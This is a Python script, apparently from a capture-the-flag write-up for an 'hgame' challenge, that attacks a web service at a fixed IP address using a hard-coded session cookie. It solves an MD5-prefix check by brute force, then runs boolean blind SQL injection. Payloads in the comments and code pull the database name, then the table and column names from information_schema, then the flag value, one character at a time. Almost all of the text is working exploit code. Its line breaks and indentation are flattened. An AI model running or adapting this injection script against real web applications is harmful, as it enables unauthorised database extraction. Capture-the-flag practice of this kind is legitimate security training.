defmd5(str): sha = hashlib.md5(str) e = sha.hexdigest() return e
res = '' url = 'http://118.89.111.179:3000/' cookie = { 'PHPSESSID':'9jgb4e4s866rpfq3ivhg75r6fq' } for i in range(1000): for j in range(33,128): r = requests.get(url,cookies=cookie) md5s = r.content[35:39] # print (md5s) code = 0 for x in range(10000000): if md5(str(x))[0:4] == md5s: code = x break url2 = 'http://118.89.111.179:3000/?code=%d&id=%s' # hgame # payload = "1 and (ascii(substr((select database()),%d,1))=%d)"%(i,j) # f1l1l1l1g,words # payload = "1 and (ascii(substr((select group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA=database()),%d,1))=%d)"%(i,j) # f14444444g # payload = "1 and (ascii(substr((select group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_NAME='f1l1l1l1g'),%d,1))=%d)"%(i,j) payload = "1 and (ascii(substr((select f14444444g from f1l1l1l1g limit 0,1),%d,1))=%d)"%(i,j) url2 = url2%(code,payload) r = requests.get(url2,cookies=cookie) if'welcome'in r.content: res += chr(j) print res break
评论